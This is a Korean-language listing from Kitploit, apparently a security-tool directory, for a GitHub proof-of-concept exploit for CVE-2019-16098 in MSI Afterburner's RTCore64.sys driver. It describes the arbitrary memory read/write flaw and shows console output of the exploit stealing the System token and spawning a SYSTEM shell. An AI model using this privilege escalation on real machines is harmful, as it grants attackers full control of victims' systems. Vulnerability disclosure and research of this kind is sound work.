Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-16098 — CVE-2019-16098용 로컬 권한 상승 PoC 익스플로잇 | Kitploit
도구/GitHubGitHub/barakat/cve-2019-16098
Privilege EscalationVulnerability AnalysisExploitationBinary ExploitationArchived
GitHubbarakat/cve-2019-16098

CVE-2019-16098

CVE-2019-16098용 로컬 권한 상승 PoC 익스플로잇

저장소 보기
2015816년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-16098

Micro-Star MSI Afterburner 4.6.2.15658 (일명 RTCore64.sys 및 RTCore32.sys)의 드라이버는 인증된 모든 사용자가 임의의 메모리, I/O 포트 및 MSR을 읽고 쓸 수 있도록 허용합니다. 이는 권한 상승, 높은 권한 하의 코드 실행 및 정보 공개에 악용될 수 있습니다. 이 서명된 드라이버는 또한 Microsoft 드라이버 서명 정책을 우회하여 악성 코드를 배포하는 데 사용될 수 있습니다.

더 많은 업데이트는 CVE-2019-16098를 방문하세요.

경고: Windows 10 x64 버전 1903 오프셋이 하드코딩되어 있습니다!

root@kitploit:~
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
Barakat

C:\Users\Barakat\source\repos\CVE-2019-16098>out\build\x64-Debug\CVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\Barakat\source\repos\CVE-2019-16098>whoami
SYSTEM

C:\Users\Barakat\source\repos\CVE-2019-16098>
도구 다운로드